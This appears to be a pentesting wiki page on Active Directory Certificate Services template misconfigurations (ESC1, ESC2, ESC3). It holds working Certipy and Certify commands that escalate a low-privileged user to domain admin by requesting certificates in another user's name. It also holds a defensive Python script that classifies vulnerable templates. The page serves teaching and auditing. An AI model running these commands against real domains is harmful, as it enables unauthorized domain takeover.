Certificate templates

Theory

AD CS Enterprise CAs issue certificates with settings defined by AD objects known as certificate templates. These templates are collections of enrollment policies and predefined certificate settings and contain things like "How long is this certificate valid for?", "What is the certificate used for?", "How is the subject specified?", "Who is allowed to request a certificate?", and a myriad of other settings
[...]
There is a specific set of settings for certificate templates that makes them extremely vulnerable. As in regular-domain-user-to-domain-admin vulnerable.
In their "Certified Pre-Owned" research paper, Will Schroeder and Lee Christensen found multiple vectors of domain escalation, three of which rest on certificate template misconfigurations (dubbed ESC1, ESC2 and ESC3).
Vulnerable configurations for ESC1, ESC2 and ESC3

Practice

Template allows SAN (ESC1)

When a certificate template lets the requester supply the subjectAltName (the CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT bit of msPKI-Certificate-Name-Flag), a low-privileged user can request a certificate for another user by placing that user's UPN in the SAN. This leads to privilege escalation when the template's EKUs allow domain authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon, Any Purpose, or no EKU at all) and nothing gates issuance: no manager approval and no authorized signature required.
UNIX-like
Windows
From UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC1 and ESC2 scenarios. The results can be written to an archive that can be uploaded into BloodHound.
certipy find 'domain.local'/'user':'password'@'domaincontroller' -bloodhound
Certipy's auto mode can also be used to automatically find and abuse misconfigured certificate templates.
Once a vulnerable template is found, request a certificate from it with a high-privileged user's name set as the SAN (-alt).
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'vulnerable template' -alt 'domain admin'
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.
By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
From Windows systems, the Certify (C#) tool can be used.
# Find vulnerable/abusable certificate templates using default low-privileged groups
Certify.exe find /vulnerable

# Find vulnerable/abusable certificate templates using all groups the current user context is a part of
Certify.exe find /vulnerable /currentuser
Once a vulnerable template is found, request a certificate from it with a high-privileged user set as SAN (subjectAltName). The CA is given as CA server\CA name; cmd.exe does not treat single quotes as quoting, so leave them out.
Certify.exe request /ca:ca_server\ca_name /template:"Vulnerable template" /altname:admin
The certificate can then be used with Pass-the-Certificate to obtain a TGT and authenticate.

Any purpose EKU (ESC2)

When a certificate template specifies the Any Purpose EKU, or no EKU at all, the issued certificate can be used for anything, including client authentication. If the requester cannot supply a SAN, ESC2 cannot be abused like ESC1 (the certificate is issued in the requester's own name), but it can be abused like ESC3: the certificate is accepted as an enrollment agent certificate to request another certificate on behalf of any user.

Certificate Agent EKU (ESC3)

When a certificate template specifies the Certificate Request Agent EKU (OID 1.3.6.1.4.1.311.20.2.1), a certificate issued from it is an enrollment agent certificate: it can be used to request another certificate on behalf of any user from a second template that permits client authentication and accepts agent requests (schema version 1 templates such as the default User template do; newer ones must require exactly one authorized signature with the Certificate Request Agent application policy). The CA must also not restrict which agents may enroll on behalf of whom (Enrollment Agent Restrictions, which are not configured by default).
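The three conditions above (ESC1 from the SAN flag, ESC2 from the Any Purpose or empty EKU list, ESC3 from the Certificate Request Agent EKU plus a suitable on-behalf-of target) all reduce to a handful of template attributes. The following is an added example, not Certipy's or Certify's code, that classifies templates from those attributes so the gates that matter (manager approval, authorized signatures, who may enroll) are explicit. The template records at the bottom are constructed for the example; the group names used as "low privileged" are an assumption, a real tool compares SIDs against the requester's token groups.

```python
# Added example: classify certificate templates as ESC1 / ESC2 / ESC3 candidates
# from the LDAP attributes that drive those conditions. Not Certipy/Certify code.

# EKU OIDs as they appear in pKIExtendedKeyUsage
EKU_CLIENT_AUTH = "1.3.6.1.5.5.7.3.2"
EKU_PKINIT_CLIENT_AUTH = "1.3.6.1.5.2.3.4"
EKU_SMARTCARD_LOGON = "1.3.6.1.4.1.311.20.2.2"
EKU_ANY_PURPOSE = "2.5.29.37.0"
EKU_CERT_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"
# EKUs that let the certificate authenticate to AD (PKINIT / Schannel)
AUTH_EKUS = {EKU_CLIENT_AUTH, EKU_PKINIT_CLIENT_AUTH, EKU_SMARTCARD_LOGON, EKU_ANY_PURPOSE}

# Flag bits from msPKI-Certificate-Name-Flag and msPKI-Enrollment-Flag
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001  # requester writes subject/SAN
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002          # "CA certificate manager approval"

# Principals treated as low-privileged (assumption for this example; a real
# tool resolves the requester's token groups by SID instead of by name)
LOW_PRIV = {"Domain Users", "Domain Computers", "Authenticated Users", "Everyone"}


def allows_auth(ekus):
    """No EKU at all, or an authentication EKU: the certificate works for PKINIT."""
    return not ekus or bool(ekus & AUTH_EKUS)


def low_priv_can_enroll(t):
    return bool(set(t["enroll"]) & LOW_PRIV)


def no_issuance_gates(t):
    """Neither manager approval nor an authorized signature blocks issuance."""
    return not (t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS) and t["ra_signature"] == 0


def classify(t):
    """Return the set of ESC conditions a template meets (possibly empty)."""
    findings = set()
    ekus = set(t["eku"])
    if not low_priv_can_enroll(t) or not no_issuance_gates(t):
        return findings
    if t["name_flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT and allows_auth(ekus):
        findings.add("ESC1")
    if not ekus or EKU_ANY_PURPOSE in ekus:
        findings.add("ESC2")
    if EKU_CERT_REQUEST_AGENT in ekus:
        findings.add("ESC3")
    return findings


def is_esc3_target(t):
    """Second half of ESC3: a template an agent certificate can enroll on behalf of.
    Schema-version-1 templates accept agent requests; newer ones must require
    exactly one signature carrying the Certificate Request Agent application policy."""
    ekus = set(t["eku"])
    if not low_priv_can_enroll(t) or not allows_auth(ekus):
        return False
    if t["enrollment_flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return False
    if t["schema_version"] == 1:
        return True
    return t["ra_signature"] == 1 and EKU_CERT_REQUEST_AGENT in t["ra_application_policies"]


def audit(templates):
    """name -> sorted findings, with 'ESC3-target' where on-behalf-of would work."""
    out = {}
    for name, t in templates.items():
        f = classify(t)
        if is_esc3_target(t):
            f.add("ESC3-target")
        out[name] = sorted(f)
    return out


def template(name_flag=0, enrollment_flag=0, ra_signature=0, eku=(), enroll=("Domain Users",),
             schema_version=2, ra_application_policies=()):
    """Build a template record with the attributes the checks above read."""
    return dict(name_flag=name_flag, enrollment_flag=enrollment_flag, ra_signature=ra_signature,
                eku=list(eku), enroll=list(enroll), schema_version=schema_version,
                ra_application_policies=list(ra_application_policies))


# Constructed sample templates, chosen to hit each condition once
TEMPLATES = {
    # Requester supplies the SAN, client auth EKU, nothing gates issuance: ESC1
    "VulnTemplate": template(name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT, eku=[EKU_CLIENT_AUTH]),
    # Same template with manager approval switched on: the gate closes it
    "VulnTemplate-approval": template(name_flag=CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT,
                                      enrollment_flag=CT_FLAG_PEND_ALL_REQUESTS,
                                      eku=[EKU_CLIENT_AUTH]),
    # Any Purpose EKU, subject built from AD (no SAN): ESC2 only
    "AnyPurpose": template(eku=[EKU_ANY_PURPOSE]),
    # Certificate Request Agent EKU enrollable by Domain Users: ESC3
    "Agent": template(eku=[EKU_CERT_REQUEST_AGENT]),
    # Built-in "User" template: schema v1, client auth, not vulnerable by itself,
    # but a valid on-behalf-of target (flag values mirror the default; assumption)
    "User": template(name_flag=0xA6000000, enrollment_flag=0x29,
                     eku=[EKU_CLIENT_AUTH], schema_version=1),
}

if __name__ == "__main__":
    for name, findings in audit(TEMPLATES).items():
        print(f"{name:24s} {', '.join(findings) or '-'}")
```

The useful detail for a defender is in `no_issuance_gates`: turning on manager approval, or requiring an authorized signature, removes ESC1, ESC2 and ESC3 from a template even when the SAN flag or the dangerous EKU stays in place, which is why `VulnTemplate-approval` reports nothing while `VulnTemplate` reports ESC1.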
UNIX-like
Windows
From UNIX-like systems, Certipy (Python) can be used to enumerate for, and conduct, the ESC3 scenario. The results can be written to an archive that can be uploaded into BloodHound.
certipy find 'domain.local'/'user':'password'@'domain_controller' -bloodhound
Once a vulnerable template is found, request a certificate from the template that carries the Certificate Request Agent EKU.
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'vulnerable template'
Then, the issued certificate (-pfx) can be used to request another certificate permitting Client Authentication on behalf of another user (-on-behalf-of, in domain\user form), here from the default User template.
certipy req 'domain.local'/'user':'password'@'ca_server' -ca 'ca_name' -template 'User' -on-behalf-of 'domain\domain admin' -pfx 'user.pfx'
By default, Certipy uses LDAPS, which is not always supported by the domain controllers. The -scheme flag can be used to set whether to use LDAP or LDAPS.
From Windows systems, the Certify (C#) tool can be used.
# Find vulnerable/abusable certificate templates using default low-privileged groups
Certify.exe find /vulnerable

# Find vulnerable/abusable certificate templates using all groups the current user context is a part of
Certify.exe find /vulnerable /currentuser
Once a vulnerable template is found, request a certificate from the template that carries the Certificate Request Agent EKU (the CA is given as CA server\CA name).
Certify.exe request /ca:ca_server\ca_name /template:"Vulnerable template"
Then, the issued certificate (/enrollcert, with its password in /enrollcertpw) can be used to request another certificate permitting Client Authentication on behalf of another user (/onbehalfof).
Certify.exe request /ca:ca_server\ca_name /template:"User" /onbehalfof:DOMAIN\Admin /enrollcert:enrollmentAgentCert.pfx /enrollcertpw:Passw0rt!

Resources

Certified Pre-Owned (Will Schroeder, Lee Christensen, SpecterOps): https://posts.specterops.io/certified-pre-owned-d95910965cd2
Certipy 2.0: BloodHound, New Escalations, Shadow Credentials, Golden Certificates, and more! (Medium)